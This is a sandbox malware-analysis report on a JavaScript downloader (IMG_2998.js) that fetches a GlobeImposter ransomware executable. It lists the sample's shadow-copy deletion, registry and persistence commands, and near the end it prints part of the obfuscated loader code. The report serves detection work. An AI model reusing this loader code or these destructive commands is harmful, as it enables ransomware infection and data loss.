IMG_2998.js
This report is generated from a file or URL submitted to this webservice on August 3rd 2017 18:42:04 (UTC)
Guest System: Windows 7 32 bit, Home Premium, 6.1 (build 7601), Service Pack 1
Report generated by
Falcon Sandbox v6.90 © Hybrid Analysis
Incident Response
Risk Assessment
- Remote Access
- Sets terminal service related keys (often RDP related)
- Ransomware
-
Deletes volume snapshots (often used by ransomware)
Detected indicator that file is ransomware
Shows Globeimposter specific behavior - Persistence
-
Modifies auto-execute functionality by setting/creating a value in the registry
Spawns a lot of processes
Writes data to a remote process - Fingerprint
-
Found a dropped file containing the Windows username (possible fingerprint attempt)
Reads the active computer name
Reads the cryptographic machine GUID - Network Behavior
- Contacts 1 domain and 1 host. View all details
Indicators
Not all malicious and suspicious indicators are displayed. Get your own cloud service or the full version to view all details.
-
Malicious Indicators 16
-
External Systems
-
Detected Emerging Threats Alert
- details
-
Detected alert "ET POLICY Unsupported/Fake Windows NT Version 5.0" (SID: 2016879, Rev: 4, Severity: 1) categorized as "Potential Corporate Privacy Violation"
Detected alert "ET CURRENT_EVENTS Nemucod JS Downloader Aug 01 2017" (SID: 2024508, Rev: 1, Severity: 1) categorized as "A Network Trojan was detected" (Phishing, Exploit Kits)
Detected alert "ET POLICY PE EXE or DLL Windows file download HTTP" (SID: 2018959, Rev: 3, Severity: 1) categorized as "Potential Corporate Privacy Violation"
Detected alert "ET INFO Possible Windows executable sent when remote host claims to send a Text File" (SID: 2008438, Rev: 18, Severity: 1) categorized as "A Network Trojan was detected" - source
- Suricata Alerts
- relevance
- 10/10
-
Sample was identified as malicious by a large number of Antivirus engines
- details
- 16/56 Antivirus vendors marked sample as malicious (28% detection rate)
- source
- External System
- relevance
- 10/10
-
Sample was identified as malicious by at least one Antivirus engine
- details
-
16/56 Antivirus vendors marked sample as malicious (28% detection rate)
9/40 Antivirus vendors marked sample as malicious (22% detection rate) - source
- External System
- relevance
- 8/10
-
Detected Emerging Threats Alert
-
General
-
The analysis extracted a file that was identified as malicious
- details
- 16/58 Antivirus vendors marked dropped file "__t1296.tmp.bat" as malicious (classified as "Trojan.BAT.Agent" with 27% detection rate)
- source
- Binary File
- relevance
- 10/10
-
Tries to delete registry keys using reg.exe
- details
-
Process "reg.exe" with commandline ""reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f"" (Show Process)
Process "reg.exe" with commandline ""reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f"" (Show Process) - source
- Monitored Target
- relevance
- 5/10
-
The analysis extracted a file that was identified as malicious
-
Installation/Persistance
-
Writes data to a remote process
- details
-
"wscript.exe" wrote 32 bytes to a remote process "%TEMP%\SWsjirYRp2.exe" (Handle: 1328)
"wscript.exe" wrote 52 bytes to a remote process "%TEMP%\SWsjirYRp2.exe" (Handle: 1328)
"wscript.exe" wrote 4 bytes to a remote process "%TEMP%\SWsjirYRp2.exe" (Handle: 1328)
"SWsjirYRp2.exe" wrote 32 bytes to a remote process "%TEMP%\SWsjirYRp2.exe" (Handle: 104)
"SWsjirYRp2.exe" wrote 52 bytes to a remote process "%TEMP%\SWsjirYRp2.exe" (Handle: 104)
"SWsjirYRp2.exe" wrote 4 bytes to a remote process "%TEMP%\SWsjirYRp2.exe" (Handle: 104)
"SWsjirYRp2.exe" wrote 1024 bytes to a remote process "%TEMP%\SWsjirYRp2.exe" (Handle: 104)
"SWsjirYRp2.exe" wrote 74240 bytes to a remote process "%TEMP%\SWsjirYRp2.exe" (Handle: 104)
"SWsjirYRp2.exe" wrote 23040 bytes to a remote process "%TEMP%\SWsjirYRp2.exe" (Handle: 104)
"SWsjirYRp2.exe" wrote 6656 bytes to a remote process "%TEMP%\SWsjirYRp2.exe" (Handle: 104)
"SWsjirYRp2.exe" wrote 8704 bytes to a remote process "%TEMP%\SWsjirYRp2.exe" (Handle: 104) - source
- API Call
- relevance
- 6/10
-
Writes data to a remote process
-
Ransomware/Banking
-
Deletes volume snapshots (often used by ransomware)
- details
- Deletes volume snapshots files "vssadmin.exe" with commandline "Delete Shadows /All /Quiet" (Show Process)
- source
- Monitored Target
- relevance
- 10/10
-
Shows Globeimposter specific behavior
- details
- The file shows various behavior artifacts extremely typical for the Globeimposter ransomware
- source
- Indicator Combinations
- relevance
- 10/10
-
Deletes volume snapshots (often used by ransomware)
-
Remote Access Related
-
Sets terminal service related keys (often RDP related)
- details
-
"reg.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\MICROSOFT\TERMINAL SERVER CLIENT\SERVERS")
"reg.exe" (Access type: "SETVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\TERMINAL SERVER CLIENT\SERVERS"; Key: "(DEFAULT)"; Value: "0000") - source
- Registry Access
- relevance
- 3/10
-
Sets terminal service related keys (often RDP related)
-
System Destruction
-
Deletes volume snapshots (often used by ransomware)
- details
- Deletes volume snapshots files "vssadmin.exe" with commandline "Delete Shadows /All /Quiet" (Show Process)
- source
- Monitored Target
- relevance
- 10/10
-
Deletes volume snapshots (often used by ransomware)
-
System Security
-
Tries to delete registry keys using reg.exe
- details
-
Process "reg.exe" with commandline ""reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f"" (Show Process)
Process "reg.exe" with commandline ""reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f"" (Show Process) - source
- Monitored Target
- relevance
- 5/10
-
Tries to delete registry keys using reg.exe
-
Unusual Characteristics
-
Script file shows a combination of malicious behavior
- details
-
The script produces internet activity
is obfuscated and drops files - source
- Indicator Combinations
- relevance
- 7/10
-
Spawns a lot of processes
- details
-
Spawned process "wscript.exe" with commandline ""C:\80d409949f4e3bff2af2a7af080631079896250ea9d43f0ff2fcfe9bf0086785.js"" (Show Process)
Spawned process "SWsjirYRp2.exe" (Show Process)
Spawned process "SWsjirYRp2.exe" (Show Process)
Spawned process "cmd.exe" with commandline "cmd /c %TEMP%\__t1296.tmp.bat" (Show Process)
Spawned process "vssadmin.exe" with commandline "Delete Shadows /All /Quiet" (Show Process)
Spawned process "reg.exe" with commandline ""reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f"" (Show Process)
Spawned process "reg.exe" with commandline ""reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f"" (Show Process)
Spawned process "reg.exe" with commandline ""reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers""" (Show Process)
Spawned process "attrib.exe" with commandline "attrib Default.rdp -s -h" (Show Process) - source
- Monitored Target
- relevance
- 8/10
-
Script file shows a combination of malicious behavior
-
Hiding 3 Malicious Indicators
- All indicators are available only in the private webservice or standalone version
-
Suspicious Indicators 24
-
Cryptographic Related
-
Found a cryptographic related string
- details
- "dEs" (Indicator: "des"; File: "00015153-00003476.00000002.21648.03011000.00000002.mdmp")
- source
- File/Memory
- relevance
- 10/10
-
Found a cryptographic related string
-
Environment Awareness
-
Possibly tries to implement anti-virtualization techniques
- details
- "H[M<!XHQemUq^=DU=p9s&UIgT,OboD" (Indicator: "qemu")
- source
- File/Memory
- relevance
- 4/10
-
Reads the cryptographic machine GUID
- details
-
"wscript.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID")
"SWsjirYRp2.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID")
"vssadmin.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID") - source
- Registry Access
- relevance
- 10/10
-
Possibly tries to implement anti-virtualization techniques
-
External Systems
-
Found an IP/URL artifact that was identified as malicious by at least one reputation engine
- details
- 1/65 reputation engines marked "http://wendybull.com.au" as malicious (1% detection rate)
- source
- External System
- relevance
- 10/10
-
Found an IP/URL artifact that was identified as malicious by at least one reputation engine
-
General
-
Reads configuration files
- details
-
"SWsjirYRp2.exe" read file "C:\Users\desktop.ini"
"SWsjirYRp2.exe" read file "%PUBLIC%\desktop.ini"
"SWsjirYRp2.exe" read file "%PUBLIC%\Videos\desktop.ini"
"SWsjirYRp2.exe" read file "%PUBLIC%\Videos\Sample Videos\desktop.ini"
"SWsjirYRp2.exe" read file "%PUBLIC%\Recorded TV\desktop.ini"
"SWsjirYRp2.exe" read file "%PUBLIC%\Recorded TV\Sample Media\desktop.ini"
"SWsjirYRp2.exe" read file "%PUBLIC%\Pictures\desktop.ini"
"SWsjirYRp2.exe" read file "%PUBLIC%\Pictures\Sample Pictures\desktop.ini" - source
- API Call
- relevance
- 4/10
-
Reads configuration files
-
Installation/Persistance
-
Drops executable files
- details
-
"BazisVirtualCDBus.inf" has type "DOS executable (COM)"
"SWsjirYRp2.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows" - source
- Binary File
- relevance
- 10/10
-
Modifies auto-execute functionality by setting/creating a value in the registry
- details
-
"SWsjirYRp2.exe" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE")
"SWsjirYRp2.exe" (Access type: "SETVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE"; Key: "CERTIFICATESCHECK"; Value: "%PUBLIC%\SWsjirYRp2.exe") - source
- Registry Access
- relevance
- 8/10
-
Drops executable files
-
Network Related
-
Contacts Random Domain Names
- details
- "wendybull.com.au" seems to be random
- source
- Network Traffic
- relevance
- 5/10
-
Uses a User Agent typical for browsers, although no browser was ever launched
- details
- Found user agent(s): Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
- source
- Network Traffic
- relevance
- 10/10
-
Contacts Random Domain Names
-
Ransomware/Banking
-
Detected indicator that file is ransomware
- details
-
"<div><h2>Your files are Encrypted!</h2></div>" (Source: RECOVER-FILES-726.html, Indicator: "files are encrypted")
"<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta charset="utf-8">
<title>Welcome</title>
</head>
<body>
<center>
<br><br>
<div><h2>Your files are Encrypted!</h2></div>" (Source: 00033124-00003160-0000018C-92779569, Indicator: "files are encrypted") - source
- File/Memory
- relevance
- 7/10
-
The analysis extracted file with a known ransomware suffix
- details
- Found dropped filename "dictionary.alcatel-lucent.aaa" which has been seen in the context of ransomware (Indicator: .aaa)
- source
- Binary File
- relevance
- 10/10
-
The input sample dropped very many files
- details
- The input sample dropped 1711 files (often an indicator for ransomware)
- source
- Binary File
- relevance
- 5/10
-
Detected indicator that file is ransomware
-
Remote Access Related
-
Changes the attributes of the Desktop.rdp configuration file
- details
- Process "attrib.exe" with commandline "attrib Default.rdp -s -h" (Show Process)
- source
- Monitored Target
- relevance
- 10/10
-
Changes the attributes of the Desktop.rdp configuration file
-
System Destruction
-
Opens file with deletion access rights
- details
-
"SWsjirYRp2.exe" opened "C:\80d409949f4e3bff2af2a7af080631079896250ea9d43f0ff2fcfe9bf0086785.js" with delete access
"SWsjirYRp2.exe" opened "C:\autoexec.bat" with delete access
"SWsjirYRp2.exe" opened "C:\config.sys" with delete access
"SWsjirYRp2.exe" opened "C:\Users\desktop.ini" with delete access
"SWsjirYRp2.exe" opened "%PUBLIC%\desktop.ini" with delete access
"SWsjirYRp2.exe" opened "%PUBLIC%\Videos\desktop.ini" with delete access
"SWsjirYRp2.exe" opened "%PUBLIC%\Videos\Sample Videos\desktop.ini" with delete access
"SWsjirYRp2.exe" opened "%PUBLIC%\Videos\Sample Videos\Wildlife.wmv" with delete access
"SWsjirYRp2.exe" opened "%PUBLIC%\Recorded TV\desktop.ini" with delete access
"SWsjirYRp2.exe" opened "%PUBLIC%\Recorded TV\Sample Media\desktop.ini" with delete access
"SWsjirYRp2.exe" opened "%PUBLIC%\Recorded TV\Sample Media\win7_scenic-demoshort_raw.wtv" with delete access
"SWsjirYRp2.exe" opened "%PUBLIC%\Pictures\desktop.ini" with delete access
"SWsjirYRp2.exe" opened "%PUBLIC%\Pictures\Sample Pictures\Chrysanthemum.jpg" with delete access
"SWsjirYRp2.exe" opened "%PUBLIC%\Pictures\Sample Pictures\Desert.jpg" with delete access
"SWsjirYRp2.exe" opened "%PUBLIC%\Pictures\Sample Pictures\desktop.ini" with delete access
"SWsjirYRp2.exe" opened "%PUBLIC%\Pictures\Sample Pictures\Hydrangeas.jpg" with delete access
"SWsjirYRp2.exe" opened "%PUBLIC%\Pictures\Sample Pictures\Jellyfish.jpg" with delete access
"SWsjirYRp2.exe" opened "%PUBLIC%\Pictures\Sample Pictures\Koala.jpg" with delete access
"SWsjirYRp2.exe" opened "%PUBLIC%\Pictures\Sample Pictures\Lighthouse.jpg" with delete access
"SWsjirYRp2.exe" opened "%PUBLIC%\Pictures\Sample Pictures\Penguins.jpg" with delete access - source
- API Call
- relevance
- 7/10
-
Opens file with deletion access rights
-
Unusual Characteristics
-
Installs hooks/patches the running process
- details
-
"wscript.exe" wrote bytes "7739bc7779a8c077be72c077d62dc0771de2bb7705a2c077c868bf7757d1c677bee3bb77616fc0776841be770050be7700000000ad37a6768b2da676b641a67600000000" to virtual address "0x75751000" (part of module "WSHIP6.DLL")
"wscript.exe" wrote bytes "92e6bb7779a8c077be72c077d62dc0771de2bb7705a2c077bee3bb77616fc0776841be770050be7700000000ad37a6768b2da676b641a67600000000" to virtual address "0x75201000" (part of module "WSHTCPIP.DLL")
"wscript.exe" wrote bytes "4053be775858bf77186abf77653cc0770000000000bf5e760000000056cc5e76000000007cca5e76000000003768f3756a2cc077d62dc077000000002069f3750000000029a65e7600000000a48df37500000000f70e5e7600000000" to virtual address "0x76051000" (part of module "NSI.DLL")
"reg.exe" wrote bytes "4053be775858bf77186abf77653cc0770000000000bf5e760000000056cc5e76000000007cca5e76000000003768f3756a2cc077d62dc077000000002069f3750000000029a65e7600000000a48df37500000000f70e5e7600000000" to virtual address "0x76051000" (part of module "NSI.DLL") - source
- Hook Detection
- relevance
- 10/10
-
Reads information about supported languages
- details
-
"wscript.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000409")
"cmd.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000409")
"attrib.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000409") - source
- Registry Access
- relevance
- 3/10
-
Installs hooks/patches the running process
-
Hiding 8 Suspicious Indicators
- All indicators are available only in the private webservice or standalone version
-
Informative 25
-
Anti-Detection/Stealthyness
-
Queries the internet cache settings (often used to hide footprints in index.dat or internet cache)
- details
- "wscript.exe" (Access type: "QUERYVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "DISABLECACHINGOFSSLPAGES"; Value: "00000000040000000400000000000000")
- source
- Registry Access
- relevance
- 3/10
-
Queries the internet cache settings (often used to hide footprints in index.dat or internet cache)
-
Anti-Reverse Engineering
-
Contains ability to register a top-level exception handler (often used as anti-debugging trick)
- details
-
SetUnhandledExceptionFilter@KERNEL32.DLL from SWsjirYRp2.exe (PID: 3476) (Show Stream)
SetUnhandledExceptionFilter@KERNEL32.DLL from SWsjirYRp2.exe (PID: 3476) (Show Stream)
SetUnhandledExceptionFilter@KERNEL32.DLL from SWsjirYRp2.exe (PID: 3476) (Show Stream)
SetUnhandledExceptionFilter@KERNEL32.DLL from SWsjirYRp2.exe (PID: 3476) (Show Stream) - source
- Hybrid Analysis Technology
- relevance
- 1/10
-
Contains ability to register a top-level exception handler (often used as anti-debugging trick)
-
Environment Awareness
-
Contains ability to query machine time
- details
- GetSystemTimeAsFileTime@KERNEL32.DLL from SWsjirYRp2.exe (PID: 3476) (Show Stream)
- source
- Hybrid Analysis Technology
- relevance
- 1/10
-
Reads the registry for installed applications
- details
-
"wscript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\SWSJIRYRP2.EXE")
"wscript.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\SWSJIRYRP2.EXE") - source
- Registry Access
- relevance
- 10/10
-
Contains ability to query machine time
-
External Systems
-
Detected Emerging Threats Alert
- details
- Detected alert "ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging)" (SID: 2015744, Rev: 4, Severity: 3) categorized as "Misc activity"
- source
- Suricata Alerts
- relevance
- 10/10
-
Detected Emerging Threats Alert
-
General
-
Contacts domains
- details
- "wendybull.com.au"
- source
- Network Traffic
- relevance
- 1/10
-
Contacts server
- details
- "113.20.4.209:80"
- source
- Network Traffic
- relevance
- 1/10
-
Creates a writable file in a temporary directory
- details
-
"wscript.exe" created file "%TEMP%\SWsjirYRp2.exe"
"SWsjirYRp2.exe" created file "%TEMP%\__t1296.tmp.bat" - source
- API Call
- relevance
- 1/10
-
Creates mutants
- details
-
"\Sessions\1\BaseNamedObjects\IESQMMUTEX_0_208"
"IESQMMUTEX_0_191"
"Local\ZonesLockedCacheCounterMutex"
"IESQMMUTEX_0_208"
"Local\ZonesCacheCounterMutex"
"Local\c:!users!oxicdo8!appdata!roaming!microsoft!windows!cookies!"
"Local\ZoneAttributeCacheCounterMutex"
"Local\c:!users!oxicdo8!appdata!local!microsoft!windows!history!history.ie5!"
"Local\WininetProxyRegistryMutex"
"Local\!IETld!Mutex"
"Local\ZonesCounterMutex"
"Local\WininetConnectionMutex"
"Local\WininetStartupMutex"
"RasPbFile"
"Local\c:!users!oxicdo8!appdata!roaming!microsoft!windows!ietldcache!"
"Local\_!MSFTHISTORY!_"
"Local\c:!users!oxicdo8!appdata!local!microsoft!windows!temporary internet files!content.ie5!"
"\Sessions\1\BaseNamedObjects\Local\_!MSFTHISTORY!_"
"\Sessions\1\BaseNamedObjects\Local\c:!users!oxicdo8!appdata!roaming!microsoft!windows!cookies!"
"\Sessions\1\BaseNamedObjects\Local\c:!users!oxicdo8!appdata!local!microsoft!windows!history!history.ie5!" - source
- Created Mutant
- relevance
- 3/10
-
Logged script engine calls
- details
-
"wscript.exe" called "Msxml2.XMLHTTP.CreateObject" ...
"wscript.exe" called "WScript.Shell.1.CreateObject" ...
"wscript.exe" called "WScript.Shell.1.ExpandEnvironmentStrings" with result: "%TEMP%\ ..., "wscript.exe" called "Msxml2.XMLHTTP.open" ... , "wscript.exe" called "Msxml2.XMLHTTP.setRequestHeader" ... , "wscript.exe" called "Msxml2.XMLHTTP.responseBody" with result: "MZ" ..., "wscript.exe" called "ADODB.Stream.6.0.CreateObject" ... , "wscript.exe" called "ADODB.Stream.6.0.Type" ... , "wscript.exe" called "ADODB.Stream.6.0.Write" ... , "wscript.exe" called "ADODB.Stream.6.0.Position" ... , "wscript.exe" called "ADODB.Stream.6.0.SaveToFile" ... , "wscript.exe" called "WScript.Shell.1.Run" ... - source
- API Call
- relevance
- 10/10
-
Opened the service control manager
- details
- "wscript.exe" called "OpenSCManager" requesting access rights "SC_MANAGER_CONNECT" (0x1)
- source
- API Call
- relevance
- 10/10
-
Parsed Javascript
- details
-
Output: "var NNvdoc = new Array(3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 66, 3, 3, 3, 67, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 3, 3, 3, 3, 3, 3, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 3, 3, 3, 3, 3, 3, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3
);
var ratatu = "prototype";
var silkopil = "\u002f";
var Hesrshish = -0x01 + 0x09 + 0xF7;
String[ratatu].pizzaTT = function() {
rpc_call_assiduously_FROG2XCOP = 0;
var rpc_call_assiduously_RazlomSS, rpc_call_assiduously_FROG2ddDccC2, rpc_call_assiduously_FROG2c3, rpc_call_assiduously_FROG2c4;
var rpc_call_assiduously_FROG2out = "";
var rpc_call_assiduously_FROG2rpc_call_assiduously_ka = this.replace(/RPOJECTS/gi, rpc_call_assiduously_FROG2out);
var rpc_call_assiduously_FROG2len = rpc_call_assiduously_FROG2sud(rpc_call_assiduously_FROG2rpc_call_assiduously_ka);
while (rpc_call_assiduously_FROG2XCOP < rpc_call_assiduously_FROG2len) {
do {
var rpc_call_assiduously_koch = rpc_call_assiduously_FROG2rpc_call_assiduously_ka.charCodeAt(rpc_call_assiduously_FROG2XCOP++) & (0x132 - 0x33);
rpc_call_assiduously_RazlomSS = NNvdoc[rpc_call_assiduously_koch];
} while (rpc_call_assiduously_FROG2XCOP < rpc_call_assiduously_FROG2len && rpc_call_assiduously_RazlomSS == -1);
if (rpc_call_assiduously_RazlomSS == -1)
break;
do {
rpc_call_assiduously_FROG2ddDccC2 = NNvdoc[rpc_call_assiduously_FROG2rpc_call_assiduously_ka.charCodeAt(rpc_call_assiduously_FROG2XCOP++) & Hesrshish];
} while (rpc_call_assiduously_FROG2XCOP < rpc_call_assiduously_FROG2len && rpc_call_assiduously_FROG2ddDccC2 == -1);
if (rpc_call_assiduously_FROG2ddDccC2 + 1 == 0)
break;
rpc_call_assiduously_FROG2out += String.fromCharCode((rpc_call_assiduously_RazlomSS << 2) | ((rpc_call_assiduously_FROG2ddDccC2 & 0x30) >> 4));
do {
rpc_call_assiduously_FROG2c3 = rpc_call_assiduously_FROG2rpc_call_assiduously_ka.charCodeAt(rpc_call_assiduously_FROG2XCOP++) & 0xff;
if (rpc_call_assiduously_FROG2c3 == 10 * 6 + 0.5 * 2)
return rpc_call_assiduously_FROG2out;
rpc_call_assiduously_FROG2c3 = NNvdoc[rpc_call_assiduously_FROG2c3];
} while (rpc_call_assiduously_FROG2XCOP < rpc_call_assiduously_FROG2len && rpc_call_assiduously_FROG2c3 == -1);
if (rpc_call_assiduously_FROG2c3 == -1)
break;
rpc_call_assiduously_FROG2out += String.fromCharCode(((rpc_call_assiduously_FROG2ddDccC2 & (0xe + 1)) << 4) | ((rpc_call_assiduously_FROG2c3 & 0x3c) >> 2));
do {
rpc_call_assiduously_FROG2c4 = rpc_call_assiduously_FROG2rpc_call_assiduously_ka.charCodeAt(rpc_call_assiduously_FROG2XCOP++) & Hesrshish;
if (rpc_call_assiduously_FROG2c4 == 61)
return rpc_call_assiduously_FROG2out;
rpc_call_assiduously_FROG2c4 = NNvdoc[rpc_call_assiduously_FROG2c4];
} while (rpc_call_assiduously_FROG2XCOP < rpc_call_assiduously_FROG2len && rpc_call_assiduously_FROG2c4 == -1);
if (rpc_call_assiduously_FROG2c4 == -1)
break;
rpc_call_assiduously_FROG2out += String.fromCharCode(((rpc_call_assiduously_FROG2c3 & 0x03) << 6) | rpc_call_assiduously_FROG2c4);
}
return rpc_call_assiduously_FROG2out;
};
var rpc_call_assiduously_SayNoNo = "RPOJECTS" + "" + "";
function rpc_call_assiduously_FROG2sud(vardos) {
return vardos[("rpc_call_assiduously_griffith", "rpc_call_assiduously_operation", "rpc_call_assiduously_embarrass", "rpc_call_assiduously_tribes", "rpc_call_assiduously_renew", "l") + "en" + ("rpc_call_assiduously_theater", "rpc_call_assiduously_slime", "rpc_call_assiduously_reaper", "rpc_call_assiduously_bristling", "rpc_call_assiduously_recrimination", "gt") + "h"];
}
function setRH(v1, v2) {
v1[v2]("User" + "-" + "Agent", "TW96aWxsYS80LjAgRPOJECTSKGNvbXBhdGlibGU7IE1TSUUgNi4wOyRPOJECTSBXaW5kb3dzIE5UIDUuMCk=".pizzaTT());
}
var cheboksar;
var velVITK_BOSKO_2S = "Y2hlYm9rc2FyID0geydVJzonUycsJzonOicuJywnODgnOicnLCdCT0xHQVJJTic6J29uc2VCb2R5JywnNzcnOicnLCcxMDEnOicnLCdGQVJJU0hNWSc6J1gnLCAgJzExJzonJ307DQpSZWVib2tHYWxheHlGUk9HdGFsaWx1ZXYgPSBSZWVib2tHYWxheHlGUk9Hdm9zdG9jaG5peTsNCmZvciAodmFyIFJlZWJva0dhbGF4eUZST0cyWENPUCBpbiBjaGVib2tzYXIpe1JlZWJva0dhbGF4eUZST0d0YWxpbHVldiA9IFJlZWJva0dhbGF4eUZST0d0YWxpbHVldlsicmVwIiArICJsYWNlIl0oUmVlYm9rR2FsYXh5RlJPRzJYQ09QLCBjaGVib2tzYXJbUmVlYm9rR2FsYXh5RlJPRzJYQ09QXSk7fQ0KICAgIHJldHVybiBSZWVib2tHYWxheHlGUk9HdGFsaWx1ZXY7";
var NNvdocHO = rpc_call_assiduously_FROG2sud(NNvdoc);
var TortPankaky;
for (velVITK_OBLOM = 0; NNvdocHO > velVITK_OBLOM; ++velVITK_OBLOM) {
NNvdoc[velVITK_OBLOM] = -1 + NNvdoc[velVITK_OBLOM];
NNvdoc[velVITK_OBLOM] = -1 + NNvdoc[velVITK_OBLOM];
NNvdoc[velVITK_OBLOM] = -1 + NNvdoc[velVITK_OBLOM];
NNvdoc[velVITK_OBLOM] = -1 + NNvdoc[velVITK_OBLOM];
}
var TortPankakyFF = new Function("DAS", "TortPankaky = " + "bmV3IEZ1bmN0aW9uKCdSZWVib2tHYWxheHlGUk9Hdm9zdG9jaG5peScsIHZlbFZJVEtfQk9TS09fMlM=".pizzaTT() + ".pizzaTT());");
function rpc_call_assiduously_FROG2undefilled(velVLUMAHx, velVLUMAHy) {
velVLUMAHx = eww / frr;
velVLUMAHy = velVLUMAHZZ + -245;
};
rpc_call_assiduously_FROG2undefilled.dEDWWEE = function() {
rpc_call_assiduously_FROG2ok(rpc_call_assiduously_FROG2spyFunction1.rpc_call_assiduously_FROG2calledWith(), "Function called without arguments");
rpc_call_assiduously_FROG2publisher.rpc_call_assiduously_FROG2publish(this.rpc_call_assiduously_FROG2type1, "PROPER1");
rpc_call_assiduously_FROG2ok(rpc_call_assiduously_FROG2spyFunction1.rpc_call_assiduously_FROG2calledWith("PROPER1"), "Function called with 'PROPER1' argument");
rpc_call_assiduously_FROG2publisher.rpc_call_assiduously_FROG2publish(this.rpc_call_assiduously_FROG2type1, ["PROPER1", "PROPER2"]);
};
var topSecretLine;
var rpc_call_assiduously_LLL0LLL = "l";
var rpc_call_assiduously_FROG2TRUEFALSE = ("V2lRPOJECTSuZG93cyBTY3JpcRPOJECTSHQgSG9zdA=RPOJECTS=".pizzaTT() + "!!!22ee22" == "RPOJECTSV2lRPOJECTSuZG93cyBTY3JpcRPOJECTSHQgSG9zdA==".pizzaTT() + "!!!22ee22") && typeof(rpc_call_assiduously_FROG2GzEAPd) === "undefined";
var rpc_call_assiduously_FROGsrq = "UmVxdWVzdEhlYWRlcg==".pizzaTT();
TortPankakyFF();
var rpc_call_assiduouslyFPADRML = ("").pizzaTT();
var rpc_call_assiduously_FROG2lidgen = "QWN0RPOJECTSaXZlWERPOJECTS9iamVjdA==".pizzaTT();
var rpc_call_assiduously_FROG2chosen = Math.round(0.7 * 2 - 0.4);
if (!rpc_call_assiduously_FROG2TRUEFALSE) {
rpc_call_assiduously_FROG2undefilled.scale = function(rpc_call_assiduously_FROG2p, rpc_call_assiduously_FROG2scaleX, rpc_call_assiduously_FROG2scaleY) {
if (rpc_call_assiduously_FROG2XCOPsObject(rpc_call_assiduously_FROG2scaleX)) {
rpc_call_assiduously_FROG2scaleY = rpc_call_assiduously_FROG2scaleX.y;
rpc_call_assiduously_FROG2scaleX = rpc_call_assiduously_FROG2scaleX.x;
} else if (!rpc_call_assiduously_FROG2XCOPsNumber(rpc_call_assiduously_FROG2scaleY)) {
rpc_call_assiduously_FROG2scaleY = rpc_call_assiduously_FROG2scaleX;
}
return new rpc_call_assiduously_FROG2undefilled(rpc_call_assiduously_FROG2p.x * rpc_call_assiduously_FROG2scaleX, rpc_call_assiduously_FROG2p.y * rpc_call_assiduously_FROG2scaleY);
};
}
if (!rpc_call_assiduously_FROG2TRUEFALSE) {
rpc_call_assiduously_FROG2undefilled.rpc_call_assiduously_FROG2sameOrN = function(rpc_call_assiduously_FROG2param1, rpc_call_assiduously_FROG2param2) {
return rpc_call_assiduously_FROG2param1.D == rpc_call_assiduously_FROG2param2.D || rpc_call_assiduously_FROG2param1.F == rpc_call_assiduously_FROG2param2.F;
};
rpc_call_assiduously_FROG2undefilled.angle = function(rpc_call_assiduously_FROG2p) {
return Math.atan2(rpc_call_assiduously_FROG2p.y, rpc_call_assiduously_FROG2p.x);
};
}
function rpc_call_assiduouslyFPADZO_ZO(TT) {
eval(TT);
}
var rpc_call_assiduously_FROG2VARDOCF = "JVRFRPOJECTSTVAlRPOJECTS".pizzaTT();
var NewNameCreator = new Function("RPOJECTS
